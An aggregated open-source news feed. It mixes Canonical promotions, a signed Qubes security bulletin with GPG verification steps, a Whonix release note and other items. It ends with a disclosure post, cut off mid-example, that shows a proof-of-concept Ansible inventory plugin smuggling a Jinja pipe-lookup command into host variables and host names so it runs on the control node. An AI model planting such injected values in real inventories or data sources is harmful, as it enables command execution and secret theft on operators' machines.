The modern enterprise can use AI algorithms and models to learn from their treasure troves of big data, and make predictions or decisions based on the data without being explicitly programmed to do so. What’s more, the AI models grow more accurate over time.
The magic is in the melding of AI and big data. Data of incredible volume, velocity, and variety is fed into the AI engine, making the AI smarter. Over time, less human intervention is needed for the AI to run properly; in time, the AI can deliver deeper insights—and strategic value—from the ever-increasing pools of data, often in real time.
In today’s competitive business environment, your AI and data strategies need to be more interconnected than ever. According to an MIT Technology Review survey, 78% of CIOs say that scaling AI to create business value is the top priority of their enterprise data strategy, and 96% of AI leaders agree. Nearly three out of four CIOs also say that data challenges are the biggest factor jeopardising AI success.
The Data Innovation Summit is a significant event in the field of Data and AI, especially in the Nordics. It brings together professionals, enterprise practitioners, technology providers, start-up innovators, and academics working with data and AI. We at Canonical are delighted to announce that we will be participating in this event and sharing our expertise in Data and AI.
Canonical is a well-known publisher of Ubuntu, which is the preferred operating system (OS) for data scientists. In addition to the OS, Canonical offers an integrated data and AI stack. We provide the most cost-effective options to help you gain control over your Total Cost of Ownership (TCO), and ensure reliable security maintenance, allowing you to innovate at a faster pace.
Canonical data and AI Product Managers, and Andreea Munteanu and Michelle Anne Tabirao will be speaking about open source for your DataOps and MLOps.
Talk description
Open source data and AI tools enable organisations to create a comprehensive solution that covers all stages of the data and machine learning lifecycle. This includes correlating data from various sources, regardless of their collection engine, and serving the model in production. Together, DataOps and MLOps drive the collaboration, communication, and integration that great data and AI teams need, making them essential to the model lifecycle. DataOps is an approach to data management that focuses on collaboration, communication, and integration among data engineers, data scientists, and other data-related roles to improve the efficiency and effectiveness of data processes. MLOps is a set of practices that combines machine learning, software development, and operations to enable the deployment, monitoring, and maintenance of machine learning models in production environments.
In this talk, we will explore how to build an end-to-end solution for DataOps and MLOps using open-source solutions like databases, ML and analytics tools such as OpenSearch, Kubeflow, and MLFlow. Professionals can focus on building ML models without spending time on the tooling operational work. We will highlight some use cases, e.g. in the telco sector, where they use MLOps and DataOPs to optimise the telco network infrastructure and reduce power consumption.
Attendees will learn about the critical factors to consider when selecting tools and best practices needed for building a robust, production-grade ML project.
If you are interested in building or scaling your data and AI projects with open source solutions, we are here to help you. Visit our Data and AI offerings to explore our solutions.
14 March, 2024 02:32AM by aida
"Todos à Tabacaria, Comprar a PC Guia!", é o novo motto do podcast. Neste episódio recebemos a visita de Giovanni Manghi - biólogo que trabalha com sistemas de informação geográfica (SIG) em Portugal desde 2008 e é militante ferrenho do Software Livre em todas as iniciativas que organiza e lugares por onde passa - nomeadamente do Qgis e sistemas GNU-Linux. Pelo caminho, falámos de confusões com o nome Ubuntu; aprender e ensinar com uma multidão de professores; distribuições Alentejanas; casos de sucesso de implantação de FLOSS em Portugal; o que falta fazer e perspectivas de futuro.
Já sabem: oiçam, subscrevam e partilhem!
Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal. E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8. Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem. Se estiverem interessados em outros bundles não listados nas notas usem o link https://www.humblebundle.com/?partner=PUP e vão estar também a apoiar-nos.
Este episódio foi produzido por Diogo Constantino, Miguel e Tiago Carrondo e editado pelo Senhor Podcast. O website é produzido por Tiago Carrondo e o código aberto está licenciado nos termos da Licença MIT. A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License. Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.
Welcome to Purism, a different type of technology company. We believe you should have technology that does not spy on you. We believe you should have complete control over your digital life. We advocate for personal privacy, cyber security, and individual freedoms. We sell hardware, develop software, and provide services according to these beliefs. To […]
The post Purism Differentiator Series, Part 7: Freedoms appeared first on Purism.
13 March, 2024 05:36PM by Todd Weaver
I attended a session titled “AI and Privacy” yesterday and was under the impression that the discussion was going to be about AI the threat to privacy. Although the subject matter was addressed by the panel somewhat, the discussion seemed to be more focused on how an alarm company partnered with Google protects their alarm […]
The post SXSW 2024 Day 5- AI And Privacy In The News, So I Thought? appeared first on Purism.
13 March, 2024 05:35PM by Rex M. Lee
13 March, 2024 09:39AM by aida
The Xen Project has released one or more Xen security advisories (XSAs). The security of Qubes OS is affected.
The following XSAs do affect the security of Qubes OS:
The following XSAs do not affect the security of Qubes OS, and no user action is necessary:
Qubes OS uses the Xen hypervisor as part of its architecture. When the Xen Project publicly discloses a vulnerability in the Xen hypervisor, they issue a notice called a Xen security advisory (XSA). Vulnerabilities in the Xen hypervisor sometimes have security implications for Qubes OS. When they do, we issue a notice called a Qubes security bulletin (QSB). (QSBs are also issued for non-Xen vulnerabilities.) However, QSBs can provide only positive confirmation that certain XSAs do affect the security of Qubes OS. QSBs cannot provide negative confirmation that other XSAs do not affect the security of Qubes OS. Therefore, we also maintain an XSA tracker, which is a comprehensive list of all XSAs publicly disclosed to date, including whether each one affects the security of Qubes OS. When new XSAs are published, we add them to the XSA tracker and publish a notice like this one in order to inform Qubes users that a new batch of XSAs has been released and whether each one affects the security of Qubes OS.
In conjunction with 3mdeb, the sixth edition of our Qubes OS Summit will be held live this year from September 20 to 22 in Berlin, Germany! For more information about this event, please see: https://vpub.dasharo.com/e/16/qubes-os-summit-2024
If you would like to submit a proposal, the Call for Participation (CFP) is open until August 5: https://cfp.3mdeb.com/qubes-os-summit-2024/cfp
Note: A newer version of this QSB has been published. See Update for QSB-101: Register File Data Sampling (XSA-452) and Intel Processor Return Predictions Advisory (INTEL-SA-00982).
We have published Qubes Security Bulletin (QSB) 101: Register File Data Sampling (XSA-452). The text of this QSB and its accompanying cryptographic signatures are reproduced below. For an explanation of this announcement and instructions for authenticating this QSB, please see the end of this announcement.
---===[ Qubes Security Bulletin 101 ]===---
2024-03-12
Register File Data Sampling (XSA-452)
User action
------------
Continue to update normally [1] in order to receive the security updates
described in the "Patching" section below. No other user action is
required in response to this QSB.
Summary
--------
On 2024-03-12, the Xen Project published XSA-452, "x86: Register File
Data Sampling" [3]:
| Intel have disclosed RFDS, Register File Data Sampling, affecting some
| Atom cores.
|
| This came from internal validation work. There is no information
| provided about how an attacker might go about inferring data from the
| register files.
For more details, see [4].
Impact
-------
An attacker might be able to infer the contents of data held previously
in floating point, vector, and/or integer register files on the same
core, including data from a more privileged context.
Affected systems
-----------------
At present, RFDS is known to affect only certain Atom cores from Intel.
Other Intel CPUs and CPUs from other hardware vendors are not known to
be affected.
RFDS affects Atom cores between the Goldmont and Gracemont
microarchitectures. This includes Alder Lake and Raptor Lake hybrid
client systems that have a mix of Gracemont and other types of cores.
Patching
---------
The following packages contain security updates that address the
vulnerabilities described in this bulletin:
For Qubes 4.1, in dom0:
- Xen packages version 4.14.6-7
- microcode_ctl 2.1-57.qubes1
For Qubes 4.2, in dom0:
- Xen packages version 4.17.3-4
- microcode_ctl 2.1-57.qubes1
These packages will migrate from the security-testing repository to the
current (stable) repository over the next two weeks after being tested
by the community. [2] Once available, the packages are to be installed
via the Qubes Update tool or its command-line equivalents. [1]
Dom0 must be restarted afterward in order for the updates to take
effect.
If you use Anti Evil Maid, you will need to reseal your secret
passphrase to new PCR values, as PCR18+19 will change due to the new
Xen binaries.
Credits
--------
See the original Xen Security Advisory.
References
-----------
[1] https://www.qubes-os.org/doc/how-to-update/
[2] https://www.qubes-os.org/doc/testing/
[3] https://xenbits.xen.org/xsa/advisory-452.html
[4] https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/advisory-guidance/register-file-data-sampling.html
--
The Qubes Security Team
https://www.qubes-os.org/security/
-----BEGIN PGP SIGNATURE-----
iQIzBAABCAAdFiEELRdx/k12ftx2sIn61lWk8hgw4GoFAmXxsFQACgkQ1lWk8hgw
4GptDhAAm63FkT4jC++iZbU8JWgVtR2YEwIDRTKeYV6qerfFSr3QJxIu4OVesfwS
d0YOXDKmu3S0mbOIqcOk9BGkh1zSTbm3wQTkzPlnKdv7TOzS0GrRAmH6a6YCBoxC
UkpnRiQI8i5ABeYG4nDKg2Tv7qY76/cGsshnh4ntuXllV0TekwTjE89qHwcy9p5T
g0v7Jir6Wk+SBmAmxNatnfipdAiX/zlXdvHusCjRjbfdqh0e1/1Ho47nUj0GtRZV
fwXBZkG1QlxffEoTbwa6K9D3EMY6RdH9O/Z80DM7mD6UT/TTwZ1LlJ4gvk/Q/kjF
6Lsc7EEbgdi9oPsO69GJiUxYLFKXpmdH3KbqLGcHPzVluh93FJl0TpKEyINCB+xE
bUSWi5SZZXWmnmlrttef+S6K8vyYxdYmZq8uhG7Qzxt5EVlnWxTu2FFHrFNO0gB8
wBaqscABiGJ8VCXgVi8rgwdXOIThethXNSlptpu419l747w07DygSGEPkgKkSzt1
UqshFG9WM47o06UH/mGOrwSFYHwq1kA0m8s38wn0Qmw4V8wwnYq9bXA+ZO2QILIa
5B5yTEOCHpqqOCDAc+WopTiQFmJ9m5+dWYalSb2XcmPoIc21bHsYalWODFLr76Zv
Fj4Vxhb9Sp1DE3FfFpI78KG/4AZbv9nfwexy8Hpy6krRwzJxJSo=
=CgMr
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEE6hjn8EDEHdrv6aoPSsGN4REuFJAFAmXxqpEACgkQSsGN4REu
FJAAmg/+JqRz8x1gF0bjKNSr38FWI2FgNg/DkmWw3cYtRiInobZejlvLy9vvX1ZL
yFYn/e4E0YIbhralqzmxYvE/dJ7DZdLQdJHODwJVk3QJT/DLrK65PmbAFxnof+wk
URWsouaQ0AAwAdWQCnTnlBHaKM8o/bdmcV9WbuSuKb64zJf2ciIU3iOQHPyxPj2Q
Whu8tg2JQZq6TVsVd6JcnD73ckQlkE58j8nyJP6WF4z5JfYvnCyzcgqbqDqabzbh
YhZyC5X8pNg5BVkX25xvun0NBj/P5NxeC1rcVTHK3XdYB8bBmoS6GobPC7T3jpCe
TQ8E2DbuAi5+oWZnMj8v0kdtNjezzP/9iWLsm865W6dczCMWZeh/nAs4aM6L1rG6
T7FogCV5lE9cVx3RqCPZpzAY9uaN0WryIZ/dLrmFbZR8T54UKWscmfWlak4TvBCS
1i3F2O4NgnzttaV/JW13hT9BUCMxc5uzYP/sRzw6zWGtxvQoSO+p3KmaFuscEhdt
tLNR5FAcmkbUUXg1uMOrrhfy5jEyLHretUzId3T9WPy9pnazcKnd6zT4HB6J+5bf
LNmriCIgQZ1B7yG7312Cadrrq3ktJPVEzUwYwx7I+7j/wQfQvaii0Lr+WM1DZUxH
KN+9pNV/SJ0I2gd5ObcX0gf8uchc548A5fIw21Oq1WopXtNEm48=
=XY1y
-----END PGP SIGNATURE-----
The purpose of this announcement is to inform the Qubes community that a new Qubes security bulletin (QSB) has been published.
A Qubes security bulletin (QSB) is a security announcement issued by the Qubes security team. A QSB typically provides a summary and impact analysis of one or more recently-discovered software vulnerabilities, including details about patching to address them. For a list of all QSBs, see Qubes security bulletins (QSBs).
QSBs tell you what actions you must take in order to protect yourself from recently-discovered security vulnerabilities. In most cases, security vulnerabilities are addressed by updating normally. However, in some cases, special user action is required. In all cases, the required actions are detailed in QSBs.
A PGP signature is a cryptographic digital signature made in accordance with the OpenPGP standard. PGP signatures can be cryptographically verified with programs like GNU Privacy Guard (GPG). The Qubes security team cryptographically signs all QSBs so that Qubes users have a reliable way to check whether QSBs are genuine. The only way to be certain that a QSB is authentic is by verifying its PGP signatures.
A forged QSB could deceive you into taking actions that adversely affect the security of your Qubes OS system, such as installing malware or making configuration changes that render your system vulnerable to attack. Falsified QSBs could sow fear, uncertainty, and doubt about the security of Qubes OS or the status of the Qubes OS Project.
The following command-line instructions assume a Linux system with git
and gpg
installed. (For Windows and Mac options, see OpenPGP software.)
Obtain the Qubes Master Signing Key (QMSK), e.g.:
$ gpg --fetch-keys https://keys.qubes-os.org/keys/qubes-master-signing-key.asc
gpg: directory '/home/user/.gnupg' created
gpg: keybox '/home/user/.gnupg/pubring.kbx' created
gpg: requesting key from 'https://keys.qubes-os.org/keys/qubes-master-signing-key.asc'
gpg: /home/user/.gnupg/trustdb.gpg: trustdb created
gpg: key DDFA1A3E36879494: public key "Qubes Master Signing Key" imported
gpg: Total number processed: 1
gpg: imported: 1
(For more ways to obtain the QMSK, see How to import and authenticate the Qubes Master Signing Key.)
View the fingerprint of the PGP key you just imported. (Note: gpg>
indicates a prompt inside of the GnuPG program. Type what appears after it when prompted.)
$ gpg --edit-key 0x427F11FD0FAA4B080123F01CDDFA1A3E36879494
gpg (GnuPG) 2.2.27; Copyright (C) 2021 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
gpg> fpr
pub rsa4096/DDFA1A3E36879494 2010-04-01 Qubes Master Signing Key
Primary key fingerprint: 427F 11FD 0FAA 4B08 0123 F01C DDFA 1A3E 3687 9494
Important: At this point, you still don’t know whether the key you just imported is the genuine QMSK or a forgery. In order for this entire procedure to provide meaningful security benefits, you must authenticate the QMSK out-of-band. Do not skip this step! The standard method is to obtain the QMSK fingerprint from multiple independent sources in several different ways and check to see whether they match the key you just imported. For more information, see How to import and authenticate the Qubes Master Signing Key.
Tip: After you have authenticated the QMSK out-of-band to your satisfaction, record the QMSK fingerprint in a safe place (or several) so that you don’t have to repeat this step in the future.
Once you are satisfied that you have the genuine QMSK, set its trust level to 5 (“ultimate”), then quit GnuPG with q
.
gpg> trust
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: unknown validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please decide how far you trust this user to correctly verify other users' keys
(by looking at passports, checking fingerprints from different sources, etc.)
1 = I don't know or won't say
2 = I do NOT trust
3 = I trust marginally
4 = I trust fully
5 = I trust ultimately
m = back to the main menu
Your decision? 5
Do you really want to set this key to ultimate trust? (y/N) y
pub rsa4096/DDFA1A3E36879494
created: 2010-04-01 expires: never usage: SC
trust: ultimate validity: unknown
[ unknown] (1). Qubes Master Signing Key
Please note that the shown key validity is not necessarily correct
unless you restart the program.
gpg> q
Use Git to clone the qubes-secpack repo.
$ git clone https://github.com/QubesOS/qubes-secpack.git
Cloning into 'qubes-secpack'...
remote: Enumerating objects: 4065, done.
remote: Counting objects: 100% (1474/1474), done.
remote: Compressing objects: 100% (742/742), done.
remote: Total 4065 (delta 743), reused 1413 (delta 731), pack-reused 2591
Receiving objects: 100% (4065/4065), 1.64 MiB | 2.53 MiB/s, done.
Resolving deltas: 100% (1910/1910), done.
Import the included PGP keys. (See our PGP key policies for important information about these keys.)
$ gpg --import qubes-secpack/keys/*/*
gpg: key 063938BA42CFA724: public key "Marek Marczykowski-Górecki (Qubes OS signing key)" imported
gpg: qubes-secpack/keys/core-devs/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 8C05216CE09C093C: 1 signature not checked due to a missing key
gpg: key 8C05216CE09C093C: public key "HW42 (Qubes Signing Key)" imported
gpg: key DA0434BC706E1FCF: public key "Simon Gaiser (Qubes OS signing key)" imported
gpg: key 8CE137352A019A17: 2 signatures not checked due to missing keys
gpg: key 8CE137352A019A17: public key "Andrew David Wong (Qubes Documentation Signing Key)" imported
gpg: key AAA743B42FBC07A9: public key "Brennan Novak (Qubes Website & Documentation Signing)" imported
gpg: key B6A0BB95CA74A5C3: public key "Joanna Rutkowska (Qubes Documentation Signing Key)" imported
gpg: key F32894BE9684938A: public key "Marek Marczykowski-Górecki (Qubes Documentation Signing Key)" imported
gpg: key 6E7A27B909DAFB92: public key "Hakisho Nukama (Qubes Documentation Signing Key)" imported
gpg: key 485C7504F27D0A72: 1 signature not checked due to a missing key
gpg: key 485C7504F27D0A72: public key "Sven Semmler (Qubes Documentation Signing Key)" imported
gpg: key BB52274595B71262: public key "unman (Qubes Documentation Signing Key)" imported
gpg: key DC2F3678D272F2A8: 1 signature not checked due to a missing key
gpg: key DC2F3678D272F2A8: public key "Wojtek Porczyk (Qubes OS documentation signing key)" imported
gpg: key FD64F4F9E9720C4D: 1 signature not checked due to a missing key
gpg: key FD64F4F9E9720C4D: public key "Zrubi (Qubes Documentation Signing Key)" imported
gpg: key DDFA1A3E36879494: "Qubes Master Signing Key" not changed
gpg: key 1848792F9E2795E9: public key "Qubes OS Release 4 Signing Key" imported
gpg: qubes-secpack/keys/release-keys/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key D655A4F21830E06A: public key "Marek Marczykowski-Górecki (Qubes security pack)" imported
gpg: key ACC2602F3F48CB21: public key "Qubes OS Security Team" imported
gpg: qubes-secpack/keys/security-team/retired: read error: Is a directory
gpg: no valid OpenPGP data found.
gpg: key 4AC18DE1112E1490: public key "Simon Gaiser (Qubes Security Pack signing key)" imported
gpg: Total number processed: 17
gpg: imported: 16
gpg: unchanged: 1
gpg: marginals needed: 3 completes needed: 1 trust model: pgp
gpg: depth: 0 valid: 1 signed: 6 trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: depth: 1 valid: 6 signed: 0 trust: 6-, 0q, 0n, 0m, 0f, 0u
Verify signed Git tags.
$ cd qubes-secpack/
$ git tag -v `git describe`
object 266e14a6fae57c9a91362c9ac784d3a891f4d351
type commit
tag marmarek_sec_266e14a6
tagger Marek Marczykowski-Górecki 1677757924 +0100
Tag for commit 266e14a6fae57c9a91362c9ac784d3a891f4d351
gpg: Signature made Thu 02 Mar 2023 03:52:04 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
The exact output will differ, but the final line should always start with gpg: Good signature from...
followed by an appropriate key. The [full]
indicates full trust, which this key inherits in virtue of being validly signed by the QMSK.
Verify PGP signatures, e.g.:
$ cd QSBs/
$ gpg --verify qsb-087-2022.txt.sig.marmarek qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 04:05:51 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify qsb-087-2022.txt.sig.simon qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 03:50:42 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
$ cd ../canaries/
$ gpg --verify canary-034-2023.txt.sig.marmarek canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 03:51:48 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify canary-034-2023.txt.sig.simon canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 01:47:52 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
Again, the exact output will differ, but the final line of output from each gpg --verify
command should always start with gpg: Good signature from...
followed by an appropriate key.
For this announcement (QSB-101), the commands are:
$ gpg --verify qsb-101-2024.txt.sig.marmarek qsb-101-2024.txt
$ gpg --verify qsb-101-2024.txt.sig.simon qsb-101-2024.txt
You can also verify the signatures directly from this announcement in addition to or instead of verifying the files from the qubes-secpack. Simply copy and paste the QSB-101 text into a plain text file and do the same for both signature files. Then, perform the same authentication steps as listed above, substituting the filenames above with the names of the files you just created.
Canonical, a leading advocate for open-source technology, is excited to announce its participation in the HPE Tech Jam 2024, set to take place in Atlanta and Vienna. This prestigious event will convene presales consultants and enterprise architects to delve into groundbreaking strategies powered by HPE’s edge-to-cloud workload solutions and products.
Canonical’s sponsorship of the Tech Jam event underscores its steadfast dedication to promoting open-source technology within the tech industry. This event serves as a prime opportunity for the company to showcase its innovative solutions, forge connections with like-minded professionals, and explore potential collaborations. Attendees can anticipate gaining invaluable insights into open-source solutions and their potential to drive business growth.
As a Silver sponsor of the event, Canonical will present its cutting-edge open-source solutions designed to foster innovation and cost savings for businesses. Visitors to Canonical’s booth can engage in interactive games demonstrating the significance of securing open-source applications.
Canonical’s participation in the event will offer attendees insights into various open-source solutions and their application in driving innovation and growth. Key highlights include:
Canonical’s presence at HPE Tech Jam underscores its unwavering commitment to promoting the adoption of open-source solutions in the tech industry. The event provides an ideal platform for Canonical to engage with industry professionals, spotlight its innovative products, and advocate for the benefits of open-source technology worldwide.
Canonical and HPE boast a longstanding partnership aimed at delivering comprehensive open-source solutions spanning infrastructure to cutting-edge, secure, cloud-native MLOps platforms. Together, they assist customers in achieving significant cost savings, optimizing operations, and enhancing performance while prioritizing top-notch security for both physical and virtual environments.
Canonical’s participation in HPE Tech Jam 2024 promises to be a milestone in advancing open-source technology and fostering collaboration within the tech community. Stay tuned for updates on Canonical’s innovative contributions at the event!
Download Whonix for VirtualBox:
This is a point release.
Alternatively, in-place release upgrade is possible upgrade using Whonix repository.
This release would not have been possible without the numerous supporters of Whonix!
Please Donate!
Please Contribute!
pulseaudio-qubes
→ pipewire-qubes
port from pulseaudio to pipewire for audio support - #17 by marmarekhttps://github.com/Whonix/derivative-maker/compare/17.1.1.5-developers-only…17.1.3.1-developers-only
1 post - 1 participant
12 March, 2024 03:50PM by Patrick
Back in 2020, the CentOS Project announced that they would focus only on CentOS Stream, meaning that CentOS 7 would be the last release with commonality to Red Hat Enterprise Linux. The End of Life (EOL) of CentOS 7 on June 30, 2024, means that there will no longer be security updates, patches or new features released for the OS.
If a user deployed Ceph on this version of CentOS, their future path is challenging. There are several options to work around the challenge of this EOL, but each comes with its own nuance:
If the user does nothing, their ageing deployments will eventually have no supported path to upgrade to future versions of Ceph, leaving them behind in terms of new features and functionality. Even worse, that user will have no options for security patches for critical security bugs.
Migrating to RedHat Enterprise Linux certainly gives a supported approach, with future updates and upgrades available, but at the cost of potentially expensive enterprise licensing for both the OS and Ceph.
Several other Linux distributions have suggested that they will be able to keep binary compatibility with upstream RHEL, but without a legal or contractual agreement this is a risky approach.
One of the most common reasons for using CentOS was in non-production test and dev systems, where compatibility was assured with RHEL but there was no licence required. So that potentially means yet more additional cost to enrol those systems in support as well.
There’s a fifth option the user could take: one that eliminates their exposure to EOL, guarantees them long-term support for their OS and application, and which cuts out the need for expensive additional licensing.
We’re talking of course about moving to another open source operating system that operates licence-free. Ubuntu Linux is hands-down the go-to OS for these requirements: it has zero licensing requirements to use, and allows you to use Ceph without a licence.
Ubuntu also prevents lock-in. For production environments support can be purchased, providing up to 24/7 telephone and ticket support. A single straightforward subscription covers not only the base OS, but also Ceph (and other applications running on the same node(s)), with flexibility that accommodates users who feel that they do not need support in the future.
Migrating data has always been a complex and time consuming process. Depending on the scenario there are multiple ways of approaching them. A user can copy their data between two storage systems via their host servers.
Or with the help of professional services an existing Ceph cluster can be converted from one operating system to another. An in-place migration, where the data remains on the same disks, just the OS and Ceph software is replaced around them is one approach. Or if deeper conversion work is required (e.g. filestore to bluestore), OSD nodes can be rotated out of the existing cluster, reconfigured and re-added, eventually replacing all of the existing installation.
These approaches can save a lot of administrative overhead, however each and every migration is bespoke, contact us to find out more.
FInd out more about Ceph here.
I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.
Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.
Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman.
For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.
And this is where things are getting interesting.
Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host.
And if that comment contains a Jinja expression, it might get executed.
And if that Jinja expression is using the pipe
lookup, it might get executed in your shell.
Let that sink in for a moment, and then we'll look at an example.
from ansible.plugins.inventory import BaseInventoryPlugin class InventoryModule(BaseInventoryPlugin): NAME = 'evgeni.inventoryrce.inventory' def verify_file(self, path): valid = False if super(InventoryModule, self).verify_file(path): if path.endswith('evgeni.yml'): valid = True return valid def parse(self, inventory, loader, path, cache=True): super(InventoryModule, self).parse(inventory, loader, path, cache) self.inventory.add_host('exploit.example.com') self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local') self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')
The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:
evgeni.inventoryrce.inventory
evgeni.yml
(we'll need that to trigger the use of this inventory later)exploit.example.com
with local
connection type and something_funny
variable to the inventoryIn reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar.
The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.
Now we install the collection containing this inventory plugin,
or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py
(or wherever your Ansible loads its collections from).
And we create a configuration file.
As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml
is all you need.
If we now call ansible-inventory
, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list { "_meta": { "hostvars": { "exploit.example.com": { "ansible_connection": "local", "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}" } } }, "all": { "children": [ "ungrouped" ] }, "ungrouped": { "hosts": [ "exploit.example.com" ] } }
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory
is required to allow the use of our inventory plugin, as it's not in the default list.)
So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.
To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.
Or a debug
task where you dump all variables of a host to analyze what's set.
Let's use that!
- hosts: all tasks: - name: Display all variables/facts known for a host ansible.builtin.debug: var: hostvars[inventory_hostname]
This playbook looks totally innocent: run against all hosts and dump their hostvars using debug
.
No mention of our funny variable.
Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml PLAY [all] ************************************************************************************************ TASK [Gathering Facts] ************************************************************************************ ok: [exploit.example.com] TASK [Display all variables/facts known for a host] ******************************************************* ok: [exploit.example.com] => { "hostvars[inventory_hostname]": { "ansible_all_ipv4_addresses": [ "192.168.122.1" ], … "something_funny": "" } } PLAY RECAP ************************************************************************************************* exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
We got all variables dumped, that was expected, but now something_funny
is an empty string?
Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }}
and touch
does not return anything.
But it did create the file!
% ls -alh /tmp/hacked -rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
We just "hacked" the Ansible control node (aka: your laptop),
as that's where lookup
is executed.
It could also have used the url
lookup to send the contents of your Ansible vault to some internet host.
Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….
This happens because set_variable(entity, varname, value)
doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.
In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText
by using wrap_var
:
from ansible.utils.unsafe_proxy import wrap_var … self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))
Which then gets rendered as a string when dumping the variables using debug
:
"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
But it seems inventories don't do this:
for k, v in host_vars.items(): self.inventory.set_variable(name, k, v)
for key, value in hostvars.items(): self.inventory.set_variable(hostname, key, value)
for k, v in hostvars.items(): try: self.inventory.set_variable(host_name, k, v) except ValueError as e: self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
And honestly, I can totally understand that.
When developing an inventory, you do not expect to handle insecure input data.
You also expect the API to handle the data in a secure way by default.
But set_variable
doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".
It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481
But even if we only look at inventories, add_host(host)
can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin class InventoryModule(BaseInventoryPlugin): NAME = 'evgeni.inventoryrce.inventory' def verify_file(self, path): valid = False if super(InventoryModule, self).verify_file(path): if path.endswith('evgeni.yml'): valid = True return valid def parse(self, inventory, loader, path, cache=True): super(InventoryModule, self).parse(inventory, loader, path, cache) self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')
